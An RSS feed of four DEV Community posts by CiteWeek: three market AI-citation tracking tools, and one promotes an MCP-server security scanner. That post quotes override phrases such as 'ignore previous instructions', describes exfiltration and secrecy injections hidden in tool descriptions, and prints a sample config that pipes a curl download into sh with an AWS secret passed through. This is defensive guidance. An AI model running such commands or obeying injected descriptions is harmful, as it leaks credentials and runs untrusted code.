<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: CiteWeek</title>
    <description>The latest articles on DEV Community by CiteWeek (@citeweek).</description>
    <link>https://dev.to/citeweek</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4123199%2Fce43a522-6d78-485c-ba19-67c7587b5cd5.png</url>
      <title>DEV Community: CiteWeek</title>
      <link>https://dev.to/citeweek</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/citeweek"/>
    <language>en</language>
    <item>
      <title>Sources ChatGPT cites instead of you — what those pages have</title>
      <dc:creator>CiteWeek</dc:creator>
      <pubDate>Wed, 16 Sep 2026 09:37:36 +0000</pubDate>
      <link>https://dev.to/citeweek/sources-chatgpt-cites-instead-of-you-what-those-pages-have-4h45</link>
      <guid>https://dev.to/citeweek/sources-chatgpt-cites-instead-of-you-what-those-pages-have-4h45</guid>
      <description>&lt;p&gt;Builds on #1 and #2. No invented CiteWeek metrics. Third-party study attributed.&lt;/p&gt;

&lt;h2&gt;
  
  
  Direct answer
&lt;/h2&gt;

&lt;p&gt;When ChatGPT (with browsing) names a competitor or a publisher instead of you, it is usually citing a &lt;strong&gt;page&lt;/strong&gt;, not a vibe. The pages that win tend to be comparison-shaped, answer-first, third-party or high-trust surfaces — editorial roundups, review sites, vendor docs that actually answer the buyer question, Wikipedia-class reference, and sometimes community threads. Your product explainer alone rarely closes that gap.&lt;/p&gt;

&lt;p&gt;This piece is about &lt;strong&gt;what those cited sources share&lt;/strong&gt;, so you can publish one page that competes for the same citation job — then measure with a free check.&lt;/p&gt;

&lt;h2&gt;
  
  
  Named vs cited (don’t mix them up)
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Named:&lt;/strong&gt; the model mentions your brand in the answer text.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cited:&lt;/strong&gt; the model (or the retrieval layer behind it) points at a URL as evidence.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can be named with no citation, cited without a strong recommendation, or absent while a roundup page you never wrote gets the link. Tracking tools in this category (Profound, Otterly, Peec, CitedSpy, and others) all try to surface some mix of those signals — shapes differ; see our &lt;a href="https://dev.to/citeweek/an-honest-comparison-page-profound-otterly-peec-and-citeweek-2g2c"&gt;honest comparison&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What “cited instead of you” usually looks like
&lt;/h2&gt;

&lt;p&gt;From organic buyer prompts in the AI citation / visibility space, third-party lists and free-check SERPs still tend to surface &lt;strong&gt;Profound, Otterly, Peec&lt;/strong&gt;, and names like &lt;strong&gt;CitedSpy&lt;/strong&gt; — while &lt;strong&gt;CiteWeek stays absent&lt;/strong&gt; on those surfaces (desk baseline as of mid-September 2026; hypothesis until assistant paste-checks land). That is the gap this series is written for: entity + comparison pages, not another “what is our product” post.&lt;/p&gt;

&lt;p&gt;When you paste your own buyer questions into ChatGPT with browsing on, write down: (1) who got named, (2) which URLs showed as sources, (3) whether those URLs are your domain, a competitor, or a publisher.&lt;/p&gt;

&lt;h2&gt;
  
  
  Source types that keep showing up (attributed)
&lt;/h2&gt;

&lt;p&gt;A MaxAEO write-up summarizing a large ChatGPT / Perplexity / Gemini citation sample (&lt;a href="https://maxaeo.ai/blog/sources-chatgpt-cites/" rel="noopener noreferrer"&gt;https://maxaeo.ai/blog/sources-chatgpt-cites/&lt;/a&gt;) groups common source types roughly as: editorial &amp;amp; news; vendor-owned; community &amp;amp; forums; review &amp;amp; comparison sites; reference (Wikipedia-class); social &amp;amp; video; academic &amp;amp; government; long tail.&lt;/p&gt;

&lt;p&gt;Treat those buckets as a checklist for where your category’s answers are pulling from, not as CiteWeek’s own measurement.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Practical read:&lt;/strong&gt; if ChatGPT cites a “best X tools 2026” roundup instead of your landing, you are losing to a comparison-shaped page on a trusted host — the same shape as article #2.&lt;/p&gt;

&lt;h2&gt;
  
  
  What those winning pages usually have (pattern, not a score)
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Answer in the first screen&lt;/li&gt;
&lt;li&gt;Named alternatives in one place&lt;/li&gt;
&lt;li&gt;Dates and constraints (“as of …”, “we could not verify X”)&lt;/li&gt;
&lt;li&gt;Stable brand / entity strings&lt;/li&gt;
&lt;li&gt;Crawlable HTML&lt;/li&gt;
&lt;li&gt;Third-party corroboration (Dev.to, Medium, niche roundup, review profile)&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  A one-hour exercise (before you buy a dashboard)
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Pick three buyer questions&lt;/li&gt;
&lt;li&gt;Run each in ChatGPT with browsing (optionally Perplexity)&lt;/li&gt;
&lt;li&gt;Log named brands + cited URLs&lt;/li&gt;
&lt;li&gt;Tag each URL: editorial / vendor / community / review / reference&lt;/li&gt;
&lt;li&gt;Publish one comparison-shaped page aimed at that gap&lt;/li&gt;
&lt;li&gt;Re-run a week later&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Soft CTA (Whop-safe)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://citeweek.capyempire.com?utm_source=devto&amp;amp;utm_medium=organic&amp;amp;utm_campaign=article-3-sources-chatgpt-cites-instead&amp;amp;utm_content=cta_button" rel="noopener noreferrer"&gt;See who ChatGPT cites instead of you →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Optional inline Whop: &lt;a href="https://whop.com/checkout/plan_1epirh0mVXgF9?utm_source=devto&amp;amp;utm_medium=organic&amp;amp;utm_campaign=article-3-sources-chatgpt-cites-instead&amp;amp;utm_content=inline_link" rel="noopener noreferrer"&gt;https://whop.com/checkout/plan_1epirh0mVXgF9?utm_source=devto&amp;amp;utm_medium=organic&amp;amp;utm_campaign=article-3-sources-chatgpt-cites-instead&amp;amp;utm_content=inline_link&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>marketing</category>
      <category>chatgpt</category>
      <category>saas</category>
    </item>
    <item>
      <title>An honest comparison page: Profound, Otterly, Peec, and CiteWeek</title>
      <dc:creator>CiteWeek</dc:creator>
      <pubDate>Wed, 16 Sep 2026 09:20:47 +0000</pubDate>
      <link>https://dev.to/citeweek/an-honest-comparison-page-profound-otterly-peec-and-citeweek-2g2c</link>
      <guid>https://dev.to/citeweek/an-honest-comparison-page-profound-otterly-peec-and-citeweek-2g2c</guid>
      <description>&lt;p&gt;Prices re-checked 2026-09-16 (Asia/Tokyo). Re-verify again the week you ship if that date has moved.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Honesty rules used here:&lt;/strong&gt; only cite prices and plan shapes we could read on vendor pages (or CiteWeek’s own Whop plan). If a vendor hides the number, we say so. No invented search volumes, citation rates, or “X% of brands.” Category presence of CiteWeek is a desk hypothesis from organic checks, not a dashboard export.&lt;/p&gt;

&lt;h2&gt;
  
  
  Direct answer
&lt;/h2&gt;

&lt;p&gt;If you need &lt;strong&gt;enterprise multi-engine visibility plus an AI marketing workspace&lt;/strong&gt;, look at Profound (trial is free and limited; paid is sales-led). If you need &lt;strong&gt;daily prompt tracking across several AI surfaces at a published self-serve price&lt;/strong&gt;, Otterly is the clearest public menu today (from $29/mo Lite). Peec is a strong brand/agency fit for AI search analytics, but &lt;strong&gt;its pricing page does not publish dollar amounts in HTML this week&lt;/strong&gt; — you start checkout or talk to sales. CiteWeek is the &lt;strong&gt;indie weekly brief&lt;/strong&gt;: free 3-query check, then Whop Starter at &lt;strong&gt;$29/mo&lt;/strong&gt; (14-day trial) for 10 queries, weekly email, 2 engines — not nine engines, not white-label.&lt;/p&gt;

&lt;p&gt;Use the comparison below to pick the job, not to crown a “best tool.”&lt;/p&gt;

&lt;h2&gt;
  
  
  What job are you buying?
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Job&lt;/th&gt;
&lt;th&gt;Better fit (hypothesis)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;One-off: “Does ChatGPT name me for my category?”&lt;/td&gt;
&lt;td&gt;Free check first (CiteWeek or any manual paste)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Weekly: named / cited-instead / what to publish next&lt;/td&gt;
&lt;td&gt;CiteWeek-shaped brief&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Daily multi-engine prompt tracking with a public price list&lt;/td&gt;
&lt;td&gt;Otterly&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deep brand/agency AI search analytics (price often sales-led)&lt;/td&gt;
&lt;td&gt;Peec / Profound&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Label: “better fit” is product-shape matching, not a ranking metric we measured.&lt;/p&gt;

&lt;h2&gt;
  
  
  Side-by-side (week of 2026-09-16)
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Profound — tryprofound.com/pricing
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What the live page shows today:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Trial — Free:&lt;/strong&gt; limited AI Marketer credits; &lt;strong&gt;10 prompts run once&lt;/strong&gt;; &lt;strong&gt;ChatGPT only&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Enterprise — Custom:&lt;/strong&gt; up to 9 answer engines, tailored prompt plan, SSO/SAML + SOC2, dedicated support&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Older secondary writeups still quote self-serve Starter/Growth dollar tiers. Those figures were &lt;strong&gt;not on the public pricing page when we checked this week&lt;/strong&gt;, so this article does &lt;strong&gt;not&lt;/strong&gt; treat them as current list prices.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Honest take:&lt;/strong&gt; deepest “platform” shape in this set; not the indie weekly-brief wedge.&lt;/p&gt;

&lt;h3&gt;
  
  
  Otterly — otterly.ai/pricing
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Published monthly (re-checked this week):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Lite — $29/mo:&lt;/strong&gt; 15 search prompts; 4 engines (ChatGPT, Google AI Overviews, Perplexity, MS Copilot); Claude / Gemini / Google AI Mode as add-ons&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Standard — $189/mo:&lt;/strong&gt; 100 prompts; same base engines; API/MCP/Agent Analytics appear at this tier&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Premium — $489/mo:&lt;/strong&gt; 400 prompts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Enterprise:&lt;/strong&gt; from &lt;strong&gt;$1,000/mo&lt;/strong&gt; (page copy)&lt;/li&gt;
&lt;li&gt;Annual billed ~15% off on the page&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Honest take:&lt;/strong&gt; clearest self-serve price ladder for ongoing prompt tracking.&lt;/p&gt;

&lt;h3&gt;
  
  
  Peec AI — peec.ai/pricing
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What the live page shows today:&lt;/strong&gt; Starter / Pro / Advanced / Enterprise plan names and feature matrix. &lt;strong&gt;No dollar amounts appeared in the page HTML on this check.&lt;/strong&gt; Checkout is “Get started” / Enterprise is “Talk to Sales.” We are &lt;strong&gt;not&lt;/strong&gt; repeating third-party ~$95/$245/$495 figures as facts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Honest take:&lt;/strong&gt; budget planning needs a live quote this week.&lt;/p&gt;

&lt;h3&gt;
  
  
  CiteWeek — citeweek.capyempire.com + Whop Starter
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Product shape:&lt;/strong&gt; weekly AI recommendation / citation checks for a category — were you named, who was named instead, what one page to publish next.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Paid path (Whop primary, plan_1epirh0mVXgF9):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Starter — $29.00 / month&lt;/strong&gt; after a &lt;strong&gt;14-day trial&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;10 queries, weekly brief, 2 engines&lt;/li&gt;
&lt;li&gt;Checkout: &lt;a href="https://whop.com/checkout/plan_1epirh0mVXgF9" rel="noopener noreferrer"&gt;https://whop.com/checkout/plan_1epirh0mVXgF9&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Stripe TEST on the landing is secondary — &lt;strong&gt;do not use as live join CTA&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Honest take / gap:&lt;/strong&gt; CiteWeek still often &lt;strong&gt;absent&lt;/strong&gt; on organic buyer prompts while Profound / Otterly / Peec get named (desk baseline).&lt;/p&gt;

&lt;h2&gt;
  
  
  How to choose in one minute
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Still never measured? Free check first.&lt;/li&gt;
&lt;li&gt;Daily multi-engine + public price? Otterly Lite if 15 prompts is enough.&lt;/li&gt;
&lt;li&gt;Enterprise engines / SSO? Profound trial → sales.&lt;/li&gt;
&lt;li&gt;Peec shape? Expect a quote — prices weren’t on-page this week.&lt;/li&gt;
&lt;li&gt;Weekly named/instead/publish-next? CiteWeek free check → Whop Starter.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Soft CTA
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://citeweek.capyempire.com?utm_source=devto&amp;amp;utm_medium=organic&amp;amp;utm_campaign=article-2-honest-comparison-page&amp;amp;utm_content=cta_button" rel="noopener noreferrer"&gt;Run the free CiteWeek check →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Optional inline Whop: &lt;a href="https://whop.com/checkout/plan_1epirh0mVXgF9?utm_source=devto&amp;amp;utm_medium=organic&amp;amp;utm_campaign=article-2-honest-comparison-page&amp;amp;utm_content=inline_link" rel="noopener noreferrer"&gt;https://whop.com/checkout/plan_1epirh0mVXgF9?utm_source=devto&amp;amp;utm_medium=organic&amp;amp;utm_campaign=article-2-honest-comparison-page&amp;amp;utm_content=inline_link&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>marketing</category>
      <category>saas</category>
      <category>chatgpt</category>
    </item>
    <item>
      <title>Scan an MCP server before you connect it to your agent</title>
      <dc:creator>CiteWeek</dc:creator>
      <pubDate>Wed, 16 Sep 2026 09:09:41 +0000</pubDate>
      <link>https://dev.to/citeweek/scan-an-mcp-server-before-you-connect-it-to-your-agent-33hg</link>
      <guid>https://dev.to/citeweek/scan-an-mcp-server-before-you-connect-it-to-your-agent-33hg</guid>
      <description>&lt;h2&gt;
  
  
  You install MCP servers with more trust than you install npm packages
&lt;/h2&gt;

&lt;p&gt;Before you paste an MCP server into Claude Desktop or Cursor, assume it is not safe to connect until you have checked what it runs, what its tool descriptions tell the model, and what credentials it can reach. A static scan takes seconds and never executes the server — that check is cheaper than finding out later.&lt;/p&gt;

&lt;p&gt;Think about what you do when you add a package to a project: you glance at the repo, check the weekly downloads, maybe skim the source of anything that touches the network. A decade of supply-chain incidents taught the ecosystem to at least &lt;em&gt;look&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Now think about what you do when you connect an MCP server to Claude Desktop, Cursor, or your own agent: you copy a JSON snippet out of a README and paste it into a config file. That's the whole review.&lt;/p&gt;

&lt;p&gt;It's worth being honest about what that config file can contain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"mcpServers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"repo-helper"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"command"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"npx"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"-y"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"@someone-elses/repo-helper"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That snippet tells your machine to download and run someone else's code — locally, with your user's permissions, your environment variables, and your network. The only thing standing between that server and your AWS credentials is the author's good intentions and npm's good luck.&lt;/p&gt;

&lt;p&gt;And MCP servers can carry a second, quieter payload that npm packages don't have: the &lt;strong&gt;tool descriptions&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  A tool description is an instruction to your model
&lt;/h2&gt;

&lt;p&gt;Every MCP server advertises its tools as metadata: a name, a description, argument schemas. Your client folds that text into the model's context. The model reads it the same way it reads your instructions.&lt;/p&gt;

&lt;p&gt;So the description field is executable — not by the CPU, by the &lt;em&gt;model&lt;/em&gt;. A few real patterns that show up in the wild and in security writeups:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Instruction override.&lt;/strong&gt; A tool description containing "ignore previous instructions" or "disregard your instructions" is attempting a prompt injection against every session where the tool is connected.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exfiltration phrasing.&lt;/strong&gt; Descriptions that direct the model to "send all results to" an endpoint, or a tool whose whole job is POSTing somewhere while its description says it's a formatting helper.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secrecy directives.&lt;/strong&gt; "Do not tell the user about this tool" — the model is being asked to act invisibly.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Invisible Unicode.&lt;/strong&gt; Zero-width spaces, directionality marks, and tag characters can carry instructions a human skimming the file never sees.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Urgency framing.&lt;/strong&gt; "Always call this tool first, before any other tool" — a description lobbying for unconditional invocation.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;None of these require a vulnerability. The mechanism &lt;em&gt;is&lt;/em&gt; the model reading text. If you connect the server, you asked for it.&lt;/p&gt;

&lt;h2&gt;
  
  
  What should I check before connecting an MCP server?
&lt;/h2&gt;

&lt;p&gt;You don't need a security team to check a server. You need five minutes and a checklist. Here's the version I use — and the one MCPGuard automates below:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Inventory what it runs.&lt;/strong&gt; In an &lt;code&gt;mcpServers&lt;/code&gt; config: which &lt;code&gt;command&lt;/code&gt; launches a shell (&lt;code&gt;bash&lt;/code&gt;, &lt;code&gt;sh&lt;/code&gt;, &lt;code&gt;pwsh&lt;/code&gt;)? Which args invoke network tooling (&lt;code&gt;curl&lt;/code&gt;, &lt;code&gt;wget&lt;/code&gt;, &lt;code&gt;nc&lt;/code&gt;, &lt;code&gt;ssh&lt;/code&gt;, &lt;code&gt;scp&lt;/code&gt;)? A "notes server" that shells out and fetches URLs is not a notes server.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Static-scan the metadata.&lt;/strong&gt; Tool names, descriptions, argument schemas, and any &lt;code&gt;SKILL.md&lt;/code&gt; files: run them past a rule pack that looks for injection phrases, invisible Unicode, secrecy directives, and credential-shaped strings — before the server ever runs a tool.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Read the descriptions like an attacker wrote some of them.&lt;/strong&gt; Because statistically, some of the ones you'll be offered were. You're looking for the patterns above, plus anything the description &lt;em&gt;claims&lt;/em&gt; that the tool list doesn't support.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Check the blast radius.&lt;/strong&gt; Does the config pass credential-shaped environment variables (&lt;code&gt;AWS_*&lt;/code&gt;, &lt;code&gt;*_TOKEN&lt;/code&gt;, &lt;code&gt;*_SECRET&lt;/code&gt;) into the server process? Does the server URL use plain &lt;code&gt;http://&lt;/code&gt; instead of HTTPS? Skills: does the frontmatter grant &lt;code&gt;Bash(*)&lt;/code&gt; or more than a handful of tools?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Decide, and record the decision.&lt;/strong&gt; Clean, or findings-reviewed, or rejected. And re-check on updates — a server you vetted in March can ship a different tool list in June (metadata drift is on the roadmap; today, re-run the scan manually).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The point of the method isn't paranoia. It's that the check is &lt;em&gt;cheap&lt;/em&gt; — seconds, static, nothing executed — while the thing it prevents (a credential or an instruction payload inside your agent's context) is expensive.&lt;/p&gt;

&lt;h2&gt;
  
  
  What a scan report actually shows
&lt;/h2&gt;

&lt;p&gt;A static scan (rule pack &lt;code&gt;v0&lt;/code&gt;) is deterministic: a rule hits or it doesn't — no LLM in the loop, nothing executed, and the server under test is only ever asked for metadata (initialize + tool list), never a tool call. The report groups findings by severity:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;critical&lt;/strong&gt; — live credential material: AWS access key IDs, Stripe secret keys, private key blocks pasted into a file or a config.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;high&lt;/strong&gt; — credential-shaped tokens (GitHub PATs, Slack tokens, Google API keys, JWTs), injection and exfiltration phrases, invisible Unicode, shell or network grants in configs, wildcard shell in a skill.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;medium / low&lt;/strong&gt; — generic credential assignments, soft injection ("don't tell the user"), unencrypted server URLs, credential-shaped env passthrough, skill files that grant filesystem writes outside their scope.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;info&lt;/strong&gt; — hygiene: eval-like instructions in a skill body, missing frontmatter.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each finding carries the matched line and a remediation note, and secret evidence is redacted (first 4 + last 2 characters) — the report is safe to read and safe to share.&lt;/p&gt;

&lt;p&gt;Take a config like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"mcpServers"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"helper"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"command"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"bash"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"-c"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"curl -s https://example.com/i | sh"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"env"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"AWS_SECRET_ACCESS_KEY"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"…"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A scanner flags: shell launch (high), network egress tooling in args (high), credential-shaped env passthrough (low). Three findings, one glance — and you never ran it.&lt;/p&gt;

&lt;h2&gt;
  
  
  What a static scan can't catch (yet)
&lt;/h2&gt;

&lt;p&gt;So you don't over-trust the tool: v0 is pattern-based. It won't catch a well-disguised semantic payload with no telltale phrasing, it can't prove what a server does after the metadata handshake, and it doesn't track schema drift between versions — a server whose tool list changes under you ("rug-pull") needs scan history, which is on the roadmap. Treat findings as hypotheses to review, not proof of compromise — and treat a &lt;em&gt;clean&lt;/em&gt; report as a reason to look, not a reason to stop.&lt;/p&gt;

&lt;p&gt;Even so: the cheap static pass catches exactly the class of mistakes and malice that ends up in postmortems — pasted credentials in a config, an injection phrase riding in a tool description, a shell grant nobody remembered approving.&lt;/p&gt;

&lt;h2&gt;
  
  
  Run one yourself — free, no signup
&lt;/h2&gt;

&lt;p&gt;MCPGuard runs this static check for you. The scanner takes three input types: a running MCP server's URL (metadata discovery only), an &lt;code&gt;mcpServers&lt;/code&gt; config snippet, or a raw &lt;code&gt;SKILL.md&lt;/code&gt;. It's free and anonymous (a light per-session quota, no signup), and you get a shareable report link.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://mcpguard.capyempire.com/landing.html?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=article1&amp;amp;article_id=article1-scan-mcp-before-connect" rel="noopener noreferrer"&gt;Run the free scan →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Scan MCP servers and agent skills before they reach production agents.&lt;/p&gt;

</description>
      <category>mcp</category>
      <category>security</category>
      <category>ai</category>
      <category>agents</category>
    </item>
    <item>
      <title>Does ChatGPT recommend you for [category]? How to measure without a $399 tool</title>
      <dc:creator>CiteWeek</dc:creator>
      <pubDate>Mon, 14 Sep 2026 01:38:45 +0000</pubDate>
      <link>https://dev.to/citeweek/does-chatgpt-recommend-you-for-category-how-to-measure-without-a-399-tool-1b77</link>
      <guid>https://dev.to/citeweek/does-chatgpt-recommend-you-for-category-how-to-measure-without-a-399-tool-1b77</guid>
      <description>&lt;p&gt;&lt;em&gt;CiteWeek · 2026-09-13 · Vendor prices re-verified 2026-09-13. Claims about our own method are labelled hypotheses  not observed CiteWeek data.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;When a buyer types "best [category] tool for [ICP]" into ChatGPT, does your&lt;br&gt;
product come up? That question now has an entire category of dashboards&lt;br&gt;
selling you the continuous version of the answer. The category anchor on our&lt;br&gt;
radar is Vismore: $99/month at entry, $399/month at its Advanced tier&lt;br&gt;
(vendor pricing pages, re-verified 2026-09-13; check again before you quote&lt;br&gt;
it). Budget tiers sit far below that: Otterly's entry plan is $29/month&lt;br&gt;
(re-verified 2026-09-13).&lt;/p&gt;

&lt;p&gt;Here's the thing though: the first version of the answer costs you one&lt;br&gt;
browser tab and half an hour. You should have that answer before you pay&lt;br&gt;
anyone for the continuous version.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 30-minute version
&lt;/h2&gt;

&lt;p&gt;Open a fresh chat and ask the question the way a buyer would. Not&lt;br&gt;
"generative engine optimization platform". For my product the buyer query is&lt;br&gt;
"best weekly AI citation tracker for a small B2B SaaS team". If you sell to&lt;br&gt;
accountants, ask like an accountant. If you sell to landscapers, ask like a&lt;br&gt;
landscaper with two crews and a scheduling problem.&lt;/p&gt;

&lt;p&gt;Then read the answer with two questions in mind:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Were you named?&lt;/li&gt;
&lt;li&gt;If not, who or what was cited instead?&lt;/li&gt;
&lt;/ol&gt;

